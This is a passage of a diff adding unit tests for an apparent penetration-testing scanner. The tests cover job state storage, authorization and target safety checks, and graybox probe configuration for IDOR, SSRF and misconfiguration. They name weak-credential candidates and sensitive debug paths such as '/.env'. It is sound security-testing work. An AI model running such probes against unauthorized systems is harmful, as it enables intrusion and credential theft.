        repo.list_live_progress()
        owner.chainstore_hgetall.assert_called_once_with(hkey="test-instance:live")

        repo.delete_live_progress("job-1:node-A")
        owner.chainstore_hset.assert_called_once_with(
            hkey="test-instance:live", key="job-1:node-A", value=None,
        )

    def test_job_state_repository_supports_typed_running_jobs(self):
        """get_running_job returns a CStoreJobRunning; put_running_job persists a dict."""
        owner = self._make_owner()
        owner.chainstore_hget.return_value = {
            "job_id": "job-1",
            "job_status": "RUNNING",
            "job_pass": 1,
            "run_mode": "SINGLEPASS",
            "launcher": "node-a",
            "launcher_alias": "node-a",
            "target": "example.com",
            "task_name": "Test",
            "start_port": 1,
            "end_port": 10,
            "date_created": 1.0,
            "job_config_cid": "QmConfig",
            "workers": {},
            "timeline": [],
            "pass_reports": [],
        }
        repo = JobStateRepository(owner)

        running = repo.get_running_job("job-1")

        self.assertIsInstance(running, CStoreJobRunning)
        persisted = repo.put_running_job(running)
        self.assertEqual(persisted["job_id"], "job-1")
        self.assertEqual(persisted["scan_type"], "network")

    def test_job_state_repository_supports_typed_live_progress(self):
        """put_live_progress_model serializes a WorkerProgress and writes it once."""
        owner = self._make_owner()
        repo = JobStateRepository(owner)
        progress = WorkerProgress(
            job_id="job-1",
            worker_addr="node-a",
            pass_nr=1,
            assignment_revision_seen=2,
            progress=25.0,
            phase="port_scan",
            scan_type="network",
            phase_index=1,
            total_phases=5,
            ports_scanned=10,
            ports_total=40,
            open_ports_found=[22],
            completed_tests=["probe"],
            updated_at=1.0,
            started_at=0.5,
            first_seen_live_at=0.5,
            last_seen_at=1.0,
        )

        persisted = repo.put_live_progress_model(progress)

        self.assertEqual(persisted["job_id"], "job-1")
        self.assertEqual(persisted["assignment_revision_seen"], 2)
        owner.chainstore_hset.assert_called_once()

    def test_cstore_worker_roundtrip_preserves_assignment_metadata(self):
        """CStoreWorker survives to_dict/from_dict with all assignment metadata."""
        original = CStoreWorker(
            start_port=1,
            end_port=100,
            assignment_revision=3,
            assigned_at=10.0,
            reannounce_count=2,
            last_reannounce_at=12.0,
            retry_reason="startup_timeout",
            terminal_reason="unreachable",
            error="worker missing",
            unreachable_at=20.0,
        )

        restored = CStoreWorker.from_dict(original.to_dict())

        self.assertEqual(restored.assignment_revision, 3)
        self.assertEqual(restored.assigned_at, 10.0)
        self.assertEqual(restored.reannounce_count, 2)
        self.assertEqual(restored.last_reannounce_at, 12.0)
        self.assertEqual(restored.retry_reason, "startup_timeout")
        self.assertEqual(restored.terminal_reason, "unreachable")
        self.assertEqual(restored.error, "worker missing")
        self.assertEqual(restored.unreachable_at, 20.0)

    def test_job_state_repository_put_job_coerces_running_job_shape(self):
        """put_job preserves webapp scan fields when coercing to the running shape."""
        owner = self._make_owner()
        repo = JobStateRepository(owner)

        payload = repo.put_job("job-1", {
            "job_id": "job-1",
            "job_status": "RUNNING",
            "job_pass": 1,
            "run_mode": "SINGLEPASS",
            "launcher": "node-a",
            "launcher_alias": "node-a",
            "target": "example.com",
            "scan_type": "webapp",
            "target_url": "https://example.com/app",
            "task_name": "Test",
            "start_port": 443,
            "end_port": 443,
            "date_created": 1.0,
            "job_config_cid": "QmConfig",
            "workers": {},
            "timeline": [],
            "pass_reports": [],
        })

        self.assertEqual(payload["scan_type"], "webapp")
        self.assertEqual(payload["target_url"], "https://example.com/app")

    def test_job_state_repository_supports_finding_triage(self):
        """Triage model/audit reads and job-level triage deletion hit the store."""
        owner = self._make_owner()
        owner.chainstore_hget.side_effect = [
            {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "note": "known issue"},
            [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 10.0}],
        ]
        owner.chainstore_hgetall.side_effect = [
            {"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}},
            {"job-1:f-1": [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 10.0}]},
        ]
        repo = JobStateRepository(owner)

        triage = repo.get_finding_triage_model("job-1", "f-1")
        audit = repo.get_finding_triage_audit("job-1", "f-1")
        repo.delete_job_triage("job-1")

        self.assertEqual(triage.status, "accepted_risk")
        self.assertEqual(audit[0]["finding_id"], "f-1")
        self.assertEqual(owner.chainstore_hset.call_count, 2)


class TestArtifactRepository(unittest.TestCase):
    """R1FS-backed artifact repository: raw JSON, secrets, and typed models."""

    def _make_owner(self):
        """Owner stub exposing a mocked r1fs client."""
        owner = MagicMock()
        owner.r1fs = MagicMock()
        return owner

    def test_artifact_repository_reads_and_writes_json(self):
        """get_json/put_json delegate to r1fs get_json/add_json."""
        owner = self._make_owner()
        repo = ArtifactRepository(owner)

        repo.get_json("QmCID")
        owner.r1fs.get_json.assert_called_once_with("QmCID")

        repo.put_json({"job_id": "job-1"}, show_logs=False)
        owner.r1fs.add_json.assert_called_once_with({"job_id": "job-1"}, show_logs=False)

    def test_artifact_repository_passes_secret_for_protected_json(self):
        """The secret kwarg is forwarded on both read and write paths."""
        owner = self._make_owner()
        repo = ArtifactRepository(owner)

        repo.get_json("QmCID", secret="node-secret-key")
        owner.r1fs.get_json.assert_called_once_with("QmCID", secret="node-secret-key")

        repo.put_json({"job_id": "job-1"}, show_logs=False, secret="node-secret-key")
        owner.r1fs.add_json.assert_called_once_with(
            {"job_id": "job-1"},
            show_logs=False,
            secret="node-secret-key",
        )

    def test_artifact_repository_job_config_helper(self):
        """get_job_config resolves the config CID out of a job record."""
        owner = self._make_owner()
        repo = ArtifactRepository(owner)

        repo.get_job_config({"job_config_cid": "QmConfig"})
        owner.r1fs.get_json.assert_called_once_with("QmConfig")

    def test_artifact_repository_delete_is_guarded_on_empty_cid(self):
        """delete('') is a no-op that never reaches r1fs."""
        owner = self._make_owner()
        repo = ArtifactRepository(owner)

        self.assertFalse(repo.delete(""))
        owner.r1fs.delete_file.assert_not_called()

    def test_artifact_repository_supports_typed_models(self):
        """Typed JobConfig reads and PassReport/JobArchive writes round-trip via r1fs."""
        owner = self._make_owner()
        repo = ArtifactRepository(owner)
        owner.r1fs.get_json.return_value = {
            "target": "example.com",
            "start_port": 1,
            "end_port": 10,
            "exceptions": [],
            "distribution_strategy": "SLICE",
            "port_order": "SEQUENTIAL",
            "nr_local_workers": 2,
            "enabled_features": [],
            "excluded_features": [],
            "run_mode": "SINGLEPASS",
        }

        job_config = repo.get_job_config_model({"job_config_cid": "QmConfig"})

        self.assertIsInstance(job_config, JobConfig)

        repo.put_pass_report(PassReport(
            pass_nr=1,
            date_started=1.0,
            date_completed=2.0,
            duration=1.0,
            aggregated_report_cid="QmAgg",
            worker_reports={},
        ))

        repo.put_archive(JobArchive(
            job_id="job-1",
            job_config=job_config.to_dict(),
            timeline=[],
            passes=[],
            ui_aggregate={"total_open_ports": [], "total_services": 0, "total_findings": 0},
            duration=1.0,
            date_created=1.0,
            date_completed=2.0,
        ))

        self.assertEqual(owner.r1fs.add_json.call_count, 2)
SafetyControls.""" + +import time +import unittest + +from extensions.business.cybersec.red_mesh.graybox.safety import SafetyControls +from extensions.business.cybersec.red_mesh.constants import ( + GRAYBOX_DEFAULT_DELAY, + GRAYBOX_MAX_WEAK_ATTEMPTS, +) + + +class TestSafetyControls(unittest.TestCase): + + def test_clamp_attempts_respects_cap(self): + """clamp_attempts enforces hard cap.""" + self.assertEqual(SafetyControls.clamp_attempts(5), 5) + self.assertEqual(SafetyControls.clamp_attempts(100), GRAYBOX_MAX_WEAK_ATTEMPTS) + self.assertEqual(SafetyControls.clamp_attempts(0), 0) + self.assertEqual(SafetyControls.clamp_attempts(-1), 0) + + def test_validate_target_no_auth(self): + """Unauthorized scan returns error.""" + err = SafetyControls.validate_target("http://example.com", authorized=False) + self.assertIsNotNone(err) + self.assertIn("not authorized", err.lower()) + + def test_validate_target_blocked(self): + """Public domains are blocked.""" + err = SafetyControls.validate_target("https://google.com", authorized=True) + self.assertIsNotNone(err) + self.assertIn("public service", err.lower()) + + def test_validate_target_blocked_subdomain(self): + """Subdomains of blocked domains are also blocked.""" + err = SafetyControls.validate_target("https://mail.google.com", authorized=True) + self.assertIsNotNone(err) + + def test_validate_target_ok(self): + """Valid URL + authorized returns None.""" + err = SafetyControls.validate_target("https://myapp.internal.com", authorized=True) + self.assertIsNone(err) + + def test_validate_target_invalid_url(self): + """Invalid URL returns error.""" + err = SafetyControls.validate_target("not-a-url", authorized=True) + self.assertIsNotNone(err) + + def test_validate_target_bad_scheme(self): + """Non-HTTP scheme returns error.""" + err = SafetyControls.validate_target("ftp://example.com", authorized=True) + self.assertIsNotNone(err) + self.assertIn("scheme", err.lower()) + + def test_sanitize_error_password(self): + 
"""Password values are scrubbed.""" + msg = SafetyControls.sanitize_error('Error: password="secret123" is wrong') + self.assertNotIn("secret123", msg) + self.assertIn("***", msg) + + def test_sanitize_error_token(self): + """Token values are scrubbed.""" + msg = SafetyControls.sanitize_error("token=abc123def in header") + self.assertNotIn("abc123def", msg) + self.assertIn("***", msg) + + def test_sanitize_error_secret(self): + """Secret values are scrubbed.""" + msg = SafetyControls.sanitize_error("secret=mysecretvalue leaked") + self.assertNotIn("mysecretvalue", msg) + self.assertIn("***", msg) + + def test_sanitize_error_preserves_normal_text(self): + """Normal text without credentials is preserved.""" + msg = SafetyControls.sanitize_error("Connection refused on port 443") + self.assertEqual(msg, "Connection refused on port 443") + + def test_throttle_delay(self): + """Requests are spaced by min_delay.""" + sc = SafetyControls(request_delay=0.05, target_is_local=True) + sc.throttle() + t1 = time.time() + sc.throttle() + t2 = time.time() + self.assertGreaterEqual(t2 - t1, 0.04) # small tolerance + + def test_min_delay_enforced_non_local(self): + """Non-local target gets GRAYBOX_DEFAULT_DELAY minimum.""" + sc = SafetyControls(request_delay=0.01, target_is_local=False) + self.assertEqual(sc._request_delay, GRAYBOX_DEFAULT_DELAY) + + def test_min_delay_local_bypass(self): + """Local target allows lower delay.""" + sc = SafetyControls(request_delay=0.01, target_is_local=True) + self.assertEqual(sc._request_delay, 0.01) + + def test_is_local_target(self): + """Recognizes localhost variants.""" + self.assertTrue(SafetyControls.is_local_target("http://localhost:8000")) + self.assertTrue(SafetyControls.is_local_target("http://127.0.0.1:3000")) + self.assertTrue(SafetyControls.is_local_target("http://[::1]:8080")) + self.assertTrue(SafetyControls.is_local_target("http://host.docker.internal")) + self.assertFalse(SafetyControls.is_local_target("http://example.com")) + + +if 
__name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_state_machine.py b/extensions/business/cybersec/red_mesh/tests/test_state_machine.py new file mode 100644 index 00000000..f2f925b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_state_machine.py @@ -0,0 +1,59 @@ +import unittest + +from extensions.business.cybersec.red_mesh.constants import ( + JOB_STATUS_ANALYZING, + JOB_STATUS_COLLECTING, + JOB_STATUS_FINALIZED, + JOB_STATUS_FINALIZING, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, +) +from extensions.business.cybersec.red_mesh.services.state_machine import ( + can_transition_job_status, + is_intermediate_job_status, + is_terminal_job_status, + set_job_status, +) + + +class TestJobStateMachine(unittest.TestCase): + + def test_allows_linear_finalization_flow(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + set_job_status(job_specs, JOB_STATUS_COLLECTING) + set_job_status(job_specs, JOB_STATUS_ANALYZING) + set_job_status(job_specs, JOB_STATUS_FINALIZING) + set_job_status(job_specs, JOB_STATUS_FINALIZED) + + self.assertEqual(job_specs["job_status"], JOB_STATUS_FINALIZED) + self.assertTrue(is_terminal_job_status(job_specs["job_status"])) + + def test_allows_continuous_jobs_to_return_to_running_after_finalizing(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + set_job_status(job_specs, JOB_STATUS_COLLECTING) + set_job_status(job_specs, JOB_STATUS_FINALIZING) + set_job_status(job_specs, JOB_STATUS_RUNNING) + + self.assertEqual(job_specs["job_status"], JOB_STATUS_RUNNING) + + def test_rejects_invalid_transition(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + with self.assertRaisesRegex(ValueError, "Invalid job status transition"): + set_job_status(job_specs, JOB_STATUS_FINALIZED) + + def test_hard_stop_is_allowed_from_intermediate_states(self): + self.assertTrue(can_transition_job_status(JOB_STATUS_COLLECTING, JOB_STATUS_STOPPED)) + 
self.assertTrue(can_transition_job_status(JOB_STATUS_ANALYZING, JOB_STATUS_STOPPED)) + self.assertTrue(can_transition_job_status(JOB_STATUS_FINALIZING, JOB_STATUS_STOPPED)) + + def test_state_classification_helpers(self): + self.assertTrue(is_intermediate_job_status(JOB_STATUS_COLLECTING)) + self.assertTrue(is_intermediate_job_status(JOB_STATUS_ANALYZING)) + self.assertTrue(is_intermediate_job_status(JOB_STATUS_FINALIZING)) + self.assertFalse(is_intermediate_job_status(JOB_STATUS_RUNNING)) + self.assertFalse(is_terminal_job_status(JOB_STATUS_SCHEDULED_FOR_STOP)) + self.assertTrue(is_terminal_job_status(JOB_STATUS_STOPPED)) diff --git a/extensions/business/cybersec/red_mesh/tests/test_target_config.py b/extensions/business/cybersec/red_mesh/tests/test_target_config.py new file mode 100644 index 00000000..7ac8bb78 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_target_config.py @@ -0,0 +1,192 @@ +"""Tests for GrayboxTargetConfig and typed endpoint models.""" + +import unittest + +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, + IdorEndpoint, + AdminEndpoint, + WorkflowEndpoint, + SsrfEndpoint, + AccessControlConfig, + MisconfigConfig, + InjectionConfig, + BusinessLogicConfig, + DiscoveryConfig, + COMMON_CSRF_FIELDS, +) +from extensions.business.cybersec.red_mesh.constants import ( + ScanType, + GRAYBOX_PROBE_REGISTRY, +) + + +class TestGrayboxTargetConfig(unittest.TestCase): + + def test_defaults(self): + """All sections empty by default, login_path is /auth/login/.""" + cfg = GrayboxTargetConfig() + self.assertEqual(cfg.login_path, "/auth/login/") + self.assertEqual(cfg.logout_path, "/auth/logout/") + self.assertEqual(cfg.username_field, "username") + self.assertEqual(cfg.password_field, "password") + self.assertEqual(cfg.csrf_field, "") + self.assertEqual(cfg.access_control.idor_endpoints, []) + self.assertEqual(cfg.access_control.admin_endpoints, []) + 
self.assertEqual(cfg.injection.ssrf_endpoints, []) + self.assertEqual(cfg.business_logic.workflow_endpoints, []) + self.assertEqual(cfg.discovery.max_pages, 50) + self.assertEqual(cfg.discovery.max_depth, 3) + + def test_from_dict_roundtrip(self): + """Round-trip to_dict/from_dict with sectioned format.""" + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=[IdorEndpoint(path="/api/records/{id}/", test_ids=[1, 2, 3])], + admin_endpoints=[AdminEndpoint(path="/api/admin/export/")], + ), + injection=InjectionConfig( + ssrf_endpoints=[SsrfEndpoint(path="/api/fetch/", param="url")], + ), + business_logic=BusinessLogicConfig( + workflow_endpoints=[WorkflowEndpoint(path="/api/pay/", method="POST")], + ), + discovery=DiscoveryConfig(scope_prefix="/api/", max_pages=100), + login_path="/login/", + csrf_field="csrf_token", + ) + d = cfg.to_dict() + restored = GrayboxTargetConfig.from_dict(d) + self.assertEqual(restored.login_path, "/login/") + self.assertEqual(restored.csrf_field, "csrf_token") + self.assertEqual(len(restored.access_control.idor_endpoints), 1) + self.assertEqual(restored.access_control.idor_endpoints[0].path, "/api/records/{id}/") + self.assertEqual(restored.access_control.idor_endpoints[0].test_ids, [1, 2, 3]) + self.assertEqual(restored.injection.ssrf_endpoints[0].param, "url") + self.assertEqual(restored.discovery.scope_prefix, "/api/") + self.assertEqual(restored.discovery.max_pages, 100) + + def test_from_dict_ignores_unknown(self): + """Extra keys in dict don't raise.""" + cfg = GrayboxTargetConfig.from_dict({"unknown_key": "value", "nested": {"foo": 1}}) + self.assertEqual(cfg.login_path, "/auth/login/") + + def test_from_dict_empty(self): + """Empty dict produces all defaults.""" + cfg = GrayboxTargetConfig.from_dict({}) + self.assertEqual(cfg.login_path, "/auth/login/") + self.assertEqual(cfg.access_control.idor_endpoints, []) + + +class TestTypedEndpoints(unittest.TestCase): + + def test_idor_endpoint_from_dict(self): 
+ """IdorEndpoint constructs from dict correctly.""" + ep = IdorEndpoint.from_dict({"path": "/api/records/{id}/", "test_ids": [5, 10]}) + self.assertEqual(ep.path, "/api/records/{id}/") + self.assertEqual(ep.test_ids, [5, 10]) + self.assertEqual(ep.owner_field, "owner") + self.assertEqual(ep.id_param, "id") + + def test_idor_endpoint_missing_path(self): + """IdorEndpoint raises on missing required 'path' field.""" + with self.assertRaises(KeyError): + IdorEndpoint.from_dict({"test_ids": [1, 2]}) + + def test_admin_endpoint_defaults(self): + """AdminEndpoint defaults method to GET.""" + ep = AdminEndpoint.from_dict({"path": "/admin/"}) + self.assertEqual(ep.method, "GET") + self.assertEqual(ep.content_markers, []) + + def test_workflow_endpoint_from_dict(self): + """WorkflowEndpoint constructs correctly.""" + ep = WorkflowEndpoint.from_dict({ + "path": "/api/pay/", + "method": "POST", + "expected_guard": "403", + }) + self.assertEqual(ep.path, "/api/pay/") + self.assertEqual(ep.method, "POST") + self.assertEqual(ep.expected_guard, "403") + + def test_ssrf_endpoint_defaults(self): + """SsrfEndpoint defaults param to 'url'.""" + ep = SsrfEndpoint.from_dict({"path": "/api/fetch/"}) + self.assertEqual(ep.param, "url") + + def test_sections_independent(self): + """Adding to one section doesn't affect others.""" + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=[IdorEndpoint(path="/a/")], + ), + ) + self.assertEqual(len(cfg.access_control.idor_endpoints), 1) + self.assertEqual(cfg.injection.ssrf_endpoints, []) + self.assertEqual(cfg.business_logic.workflow_endpoints, []) + + def test_misconfig_default_paths(self): + """MisconfigConfig has sensible default debug paths.""" + cfg = MisconfigConfig() + self.assertIn("/.env", cfg.debug_paths) + self.assertIn("/actuator", cfg.debug_paths) + + def test_discovery_config_from_dict(self): + """DiscoveryConfig round-trips correctly.""" + dc = DiscoveryConfig.from_dict({"scope_prefix": "/app/", 
"max_pages": 25, "max_depth": 5}) + self.assertEqual(dc.scope_prefix, "/app/") + self.assertEqual(dc.max_pages, 25) + self.assertEqual(dc.max_depth, 5) + + +class TestScanTypeEnum(unittest.TestCase): + + def test_scan_type_values(self): + """ScanType.WEBAPP == 'webapp', ScanType.NETWORK == 'network'.""" + self.assertEqual(ScanType.WEBAPP, "webapp") + self.assertEqual(ScanType.NETWORK, "network") + self.assertEqual(ScanType.WEBAPP.value, "webapp") + + def test_scan_type_is_str(self): + """ScanType members are strings (str, Enum).""" + self.assertIsInstance(ScanType.WEBAPP, str) + self.assertIsInstance(ScanType.NETWORK, str) + + +class TestProbeRegistry(unittest.TestCase): + + def test_registry_structure(self): + """All entries have 'key' and 'cls' fields.""" + for entry in GRAYBOX_PROBE_REGISTRY: + self.assertIn("key", entry, f"Missing 'key' in registry entry: {entry}") + self.assertIn("cls", entry, f"Missing 'cls' in registry entry: {entry}") + + def test_registry_keys_only(self): + """Registry entries have exactly 'key' and 'cls' — capabilities live on probe class.""" + for entry in GRAYBOX_PROBE_REGISTRY: + self.assertEqual(set(entry.keys()), {"key", "cls"}, + f"Registry entry has extra keys: {entry}") + + def test_registry_has_expected_probes(self): + """Registry includes access_control, misconfig, injection, business_logic.""" + keys = [e["key"] for e in GRAYBOX_PROBE_REGISTRY] + self.assertIn("_graybox_access_control", keys) + self.assertIn("_graybox_misconfig", keys) + self.assertIn("_graybox_injection", keys) + self.assertIn("_graybox_business_logic", keys) + + +class TestCsrfFields(unittest.TestCase): + + def test_common_csrf_fields(self): + """COMMON_CSRF_FIELDS contains Django, Flask, Rails, Spring, Laravel.""" + self.assertIn("csrfmiddlewaretoken", COMMON_CSRF_FIELDS) + self.assertIn("csrf_token", COMMON_CSRF_FIELDS) + self.assertIn("authenticity_token", COMMON_CSRF_FIELDS) + self.assertIn("_csrf", COMMON_CSRF_FIELDS) + self.assertIn("_token", 
COMMON_CSRF_FIELDS) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_worker.py b/extensions/business/cybersec/red_mesh/tests/test_worker.py new file mode 100644 index 00000000..3be7b804 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_worker.py @@ -0,0 +1,827 @@ +"""Tests for GrayboxLocalWorker.""" + +import unittest +from unittest.mock import MagicMock, patch, PropertyMock + +from extensions.business.cybersec.red_mesh.graybox.worker import GrayboxLocalWorker +from extensions.business.cybersec.red_mesh.worker.base import BaseLocalWorker +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxEvidenceArtifact, GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models import ( + DiscoveryResult, + GrayboxCredentialSet, + GrayboxProbeContext, + GrayboxProbeDefinition, + GrayboxProbeRunResult, +) +from extensions.business.cybersec.red_mesh.constants import ( + ScanType, GRAYBOX_PROBE_REGISTRY, +) + + +def _make_job_config(**overrides): + cfg = MagicMock() + cfg.scan_type = "webapp" + cfg.target_url = "http://testapp.local:8000" + cfg.official_username = "admin" + cfg.official_password = "secret" + cfg.regular_username = "alice" + cfg.regular_password = "pass" + cfg.weak_candidates = None + cfg.max_weak_attempts = 5 + cfg.app_routes = None + cfg.verify_tls = True + cfg.target_config = None + cfg.allow_stateful_probes = False + cfg.excluded_features = [] + cfg.scan_min_delay = 0.0 + cfg.authorized = True + for k, v in overrides.items(): + setattr(cfg, k, v) + return cfg + + +def _make_worker(**overrides): + owner = MagicMock() + owner.P = MagicMock() + cfg = _make_job_config(**overrides) + with patch("extensions.business.cybersec.red_mesh.graybox.worker.SafetyControls"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.AuthManager"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.DiscoveryModule"): + worker = 
GrayboxLocalWorker( + owner=owner, + job_id="test-job-1", + target_url=cfg.target_url, + job_config=cfg, + local_id="1", + initiator="test-node", + ) + return worker + + +class TestBaseLocalWorkerIntegration(unittest.TestCase): + + def test_inherits_base(self): + """GrayboxLocalWorker inherits from BaseLocalWorker.""" + self.assertTrue(issubclass(GrayboxLocalWorker, BaseLocalWorker)) + + def test_start_inherited(self): + """start() is not redefined.""" + self.assertNotIn("start", GrayboxLocalWorker.__dict__) + + def test_stop_inherited(self): + """stop() is not redefined.""" + self.assertNotIn("stop", GrayboxLocalWorker.__dict__) + + def test_check_stopped_inherited(self): + """_check_stopped() is not redefined.""" + self.assertNotIn("_check_stopped", GrayboxLocalWorker.__dict__) + + def test_local_worker_id_format(self): + """local_worker_id starts with RM-.""" + worker = _make_worker() + self.assertTrue(worker.local_worker_id.startswith("RM-")) + + def test_initial_ports_is_list(self): + """initial_ports is a list.""" + worker = _make_worker() + self.assertIsInstance(worker.initial_ports, list) + self.assertEqual(worker.initial_ports, [8000]) + + def test_ports_scanned_is_list(self): + """state['ports_scanned'] is a list.""" + worker = _make_worker() + self.assertIsInstance(worker.state["ports_scanned"], list) + + +class TestStateShape(unittest.TestCase): + + def test_state_shape(self): + """State dict has all required keys.""" + worker = _make_worker() + required = [ + "job_id", "initiator", "target", "scan_type", "target_url", + "open_ports", "ports_scanned", "port_protocols", "service_info", + "web_tests_info", "correlation_findings", "graybox_results", + "completed_tests", "done", "canceled", + ] + for key in required: + self.assertIn(key, worker.state, f"Missing state key: {key}") + + def test_state_has_scan_type(self): + """state['scan_type'] == 'webapp'.""" + worker = _make_worker() + self.assertEqual(worker.state["scan_type"], "webapp") + + def 
test_graybox_results_populated(self): + """Findings stored in graybox_results, not web_tests_info.""" + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + worker._store_findings("_test_probe", [finding]) + self.assertIn("8000", worker.state["graybox_results"]) + self.assertIn("_test_probe", worker.state["graybox_results"]["8000"]) + self.assertEqual(worker.state["web_tests_info"], {}) + + +class TestStatus(unittest.TestCase): + + def test_get_status_scan_metrics_key(self): + """Status includes scan_metrics key.""" + worker = _make_worker() + status = worker.get_status() + self.assertIn("scan_metrics", status) + + def test_get_status_includes_scenario_stats(self): + """Status includes scenario_stats.""" + worker = _make_worker() + status = worker.get_status() + self.assertIn("scenario_stats", status) + + def test_get_status_merges_scenario_stats_into_scan_metrics(self): + """scan_metrics includes graybox scenario counters.""" + worker = _make_worker() + worker._store_findings("_test_probe", [GrayboxFinding( + scenario_id="TEST-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + )]) + status = worker.get_status() + self.assertEqual(status["scan_metrics"]["scenarios_total"], 1) + self.assertEqual(status["scan_metrics"]["scenarios_vulnerable"], 1) + + def test_get_status_for_aggregations(self): + """for_aggregations=True omits local_worker_id.""" + worker = _make_worker() + status = worker.get_status(for_aggregations=True) + self.assertNotIn("local_worker_id", status) + status_full = worker.get_status(for_aggregations=False) + self.assertIn("local_worker_id", status_full) + + +class TestLifecycle(unittest.TestCase): + + def test_start_creates_thread(self): + """start() creates thread and stop_event.""" + worker = _make_worker() + # Patch execute_job to avoid actual execution + worker.execute_job = MagicMock() + worker.start() + 
self.assertIsNotNone(worker.thread) + self.assertIsNotNone(worker.stop_event) + worker.thread.join(timeout=1) + + def test_stop_sets_events(self): + """stop() sets stop_event and state['canceled'].""" + worker = _make_worker() + worker.execute_job = MagicMock() + worker.start() + worker.stop() + self.assertTrue(worker.stop_event.is_set()) + self.assertTrue(worker.state["canceled"]) + worker.thread.join(timeout=1) + + def test_check_stopped_after_stop(self): + """_check_stopped() returns True after stop().""" + worker = _make_worker() + worker.execute_job = MagicMock() + worker.start() + worker.stop() + self.assertTrue(worker._check_stopped()) + worker.thread.join(timeout=1) + + +class TestExecution(unittest.TestCase): + + def test_metrics_phase_timing(self): + """Phase durations populated after execute_job.""" + worker = _make_worker() + # Mock auth to succeed + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.safety.validate_target.return_value = None + + # Mock discovery + worker.discovery.discover.return_value = ([], []) + + # Mock probe registry to be empty for fast execution + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + worker.execute_job() + + self.assertTrue(worker.state["done"]) + metrics = worker.metrics.build() + self.assertTrue(len(metrics.phase_durations) > 0) + + def test_worker_builds_typed_credentials(self): + worker = _make_worker(regular_username="alice", regular_password="pass", weak_candidates=["admin:admin"]) + self.assertIsInstance(worker._credentials, GrayboxCredentialSet) + self.assertEqual(worker._credentials.official.username, "admin") + self.assertEqual(worker._credentials.regular.username, "alice") + 
self.assertEqual(worker._credentials.weak_candidates, ["admin:admin"]) + + def test_discovery_phase_returns_typed_result(self): + worker = _make_worker() + worker.auth.ensure_sessions = MagicMock() + worker.discovery.discover_result = MagicMock(return_value=DiscoveryResult(routes=["/a"], forms=["/f"])) + + result = worker._run_discovery_phase() + + self.assertIsInstance(result, DiscoveryResult) + self.assertEqual(result.routes, ["/a"]) + + def test_discovery_phase_fails_closed_when_refresh_fails(self): + worker = _make_worker() + worker.auth.ensure_sessions = MagicMock(return_value=False) + + result = worker._run_discovery_phase() + + self.assertEqual(result, DiscoveryResult()) + self.assertIn("_graybox_fatal", worker.state["graybox_results"]["8000"]) + + def test_build_probe_context_returns_typed_context(self): + worker = _make_worker(regular_username="alice") + context = worker._build_probe_kwargs(DiscoveryResult(routes=["/r"], forms=["/f"])) + self.assertIsInstance(context, GrayboxProbeContext) + self.assertEqual(context.discovered_routes, ["/r"]) + self.assertEqual(context.discovered_forms, ["/f"]) + self.assertEqual(context.regular_username, "alice") + + def test_supported_features_come_from_typed_probe_definitions(self): + with patch( + "extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_graybox_alpha", "cls": "fake.Alpha"}], + ): + self.assertEqual( + GrayboxLocalWorker.get_supported_features(), + ["_graybox_alpha", "_graybox_weak_auth"], + ) + + def test_scenario_stats(self): + """Scenario stats count findings by status.""" + worker = _make_worker() + worker._store_findings("_test", [ + GrayboxFinding( + scenario_id="T1", title="Vuln", status="vulnerable", + severity="HIGH", owasp="A01:2021", + ), + GrayboxFinding( + scenario_id="T2", title="Clean", status="not_vulnerable", + severity="INFO", owasp="A01:2021", + ), + ]) + stats = worker._compute_scenario_stats() + self.assertEqual(stats["total"], 2) + 
self.assertEqual(stats["vulnerable"], 1) + self.assertEqual(stats["not_vulnerable"], 1) + + def test_registered_probe_records_auth_refresh_failure(self): + worker = _make_worker() + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth.ensure_sessions = MagicMock(return_value=False) + worker.auth._auth_errors = [] + probe_context = worker._build_probe_kwargs(DiscoveryResult()) + mock_cls = MagicMock() + mock_cls.requires_regular_session = False + mock_cls.requires_auth = True + mock_cls.is_stateful = False + + with patch.object(worker, "_import_probe", return_value=mock_cls): + worker._run_registered_probe({"key": "_graybox_test", "cls": "fake.Probe"}, probe_context) + + self.assertEqual(worker.metrics.build().probes_failed, 1) + self.assertIn("_graybox_fatal", worker.state["graybox_results"]["8000"]) + self.assertEqual(worker.metrics.build().probe_breakdown["_graybox_test"], "failed:auth_refresh") + + def test_store_findings_accepts_typed_probe_run_result(self): + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-01", + title="Typed result", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + run_result = GrayboxProbeRunResult(findings=[finding], outcome="completed") + + worker._store_findings("_typed_probe", run_result) + + stored = worker.state["graybox_results"]["8000"]["_typed_probe"] + 